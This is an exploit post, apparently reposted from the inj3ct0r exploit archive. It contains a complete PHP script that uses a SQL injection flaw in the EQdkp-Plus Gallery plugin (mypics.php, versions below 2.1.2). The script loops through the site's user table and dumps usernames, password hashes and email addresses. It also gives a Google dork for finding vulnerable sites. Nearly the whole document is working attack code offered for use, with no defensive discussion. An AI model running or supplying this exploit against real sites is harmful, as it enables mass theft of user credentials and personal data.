EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty
============================================================
#!/bin/php
<?php
/*
######################################################################
# _ _ _ _ #
# | | | | | | | | #
# | |__ _ _| |_ ___| |__ _ _ _ __ | | _____ _ __ #
# | ‘_ | | | | __/ _ ‘_ | | | | ‘_ | |/ / _ ‘__| #
# | |_) | |_| | || __/ |_) | |_| | | | | < __/ | #
# |_.__/ __, |_____|_.__/ __,_|_| |_|_|____|_| #
# __/ | by jiuX #
# |___/ #
######################################################################
# Name : EQdkp-Plus Gallery < v2.1.2
# Date : 10.07.2010
# Platform: Linux/Windows
# Vendor : Badtwin & Lunary
# Google Dork: > "EQDKP Plus" inurl:mypics.php <
# greetz to : x2k, medison, x33, bl4ckn3ss, Luk …
######################################################################
*/
$x = $argv[1]."/portal/plugins/gallery/mypics.php?pid=-1337+and+1=0+union+select+1,2,concat%280×62797465,username,0×3A,user_password,0×3A,user_email,0×62756e6b6572%29,4,5,6,7,8+from+eqdkp_users";
function b($b,$c) {
$b = file_get_contents($b."+limit+".$c.",1–%20-");
preg_match_all("/byte(.*)bunker/",$b,$w, PREG_PATTERN_ORDER);
$w = explode(":",$w[1][0]);
if (!$w[0]=="") {
echo "ID: ".$c."nUsername: ".$w[0]."n";echo "Password: ".$w[1]."n";echo "E-Mail: ".$w[2]."n———————–n";return true;
}else{return false;}}
echo "———————–nChecking: ".$argv[1]."n———————–n";
$i=0;$bb=true;while($bb == true){ $bb = b($x,$i); $i++; }
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-10]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13273
Leave a Reply